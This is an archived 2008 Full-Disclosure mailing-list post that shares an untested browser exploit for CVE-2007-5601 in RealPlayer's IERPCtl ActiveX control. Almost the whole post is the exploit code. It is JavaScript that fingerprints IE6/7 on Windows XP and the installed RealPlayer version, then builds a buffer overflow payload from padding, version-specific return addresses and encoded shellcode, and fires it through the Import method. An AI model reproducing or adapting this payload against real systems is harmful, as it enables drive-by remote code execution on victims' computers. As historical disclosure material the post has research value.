lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8656dcd50811070027w22e1ed11vc6d0c38eadf0f549@mail.gmail.com>
Date: Fri, 7 Nov 2008 13:57:03 +0530
From: webDEViL <w3bd3vil@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: CVE-2007-5601exploit

Maybe this is of interest to someone....
Not tested.
This should relate to CVE-2007-5601


 <script language="javascript">

eval("function RealExploit()

{

var user = navigator.userAgent.toLowerCase();

if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)

  return;

if(user.indexOf("nt 5.")==-1)

  return;

VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";

try

{

  Real = new ActiveXObject(VulObject);

}catch(error)

{

  return;

}

RealVersion = Real.PlayerProperty("PRODUCTVERSION");

Padding = "";

JmpOver = unescape("%75%06%74%04");

for(i=0;i<32*148;i++)

  Padding += "S";





if(RealVersion.indexOf("6.0.14.") == -1)

{

  if(navigator.userLanguage.toLowerCase() == "zh-cn")

   ret = unescape("%7f%a5%60");

  else if(navigator.userLanguage.toLowerCase() == "en-us")

   ret = unescape("%4f%71%a4%60");

  else

   return;

}

else if(RealVersion == "6.0.14.544")

  ret = unescape("%63%11%08%60");

else if(RealVersion == "6.0.14.550")

  ret = unescape("%63%11%04%60");

else if(RealVersion == "6.0.14.552")

  ret = unescape("%79%31%01%60");

else if(RealVersion == "6.0.14.543")

  ret = unescape("%79%31%09%60");

else if(RealVersion == "6.0.14.536")

  ret = unescape("%51%11%70%63");

else

  return;







if(RealVersion.indexOf("6.0.10.") != -1)

{

  for(i=0;i<4;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.11.") != -1)

{

  for(i=0;i<6;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.12.") != -1)

{

  for(i=0;i<9;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.14.") != -1)

{

  for(i=0;i<10;i++)

   Padding = Padding + JmpOver;

   Padding = Padding + ret;

}



AdjESP = "LLLL\\XXXXXLD";

Shell =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp";

PayLoad = Padding + AdjESP + Shell;

while(PayLoad.length < 0x8000)

  PayLoad += "YuanGe"; // ?~??~-.=!

Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);

}

RealExploit();")

</script>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ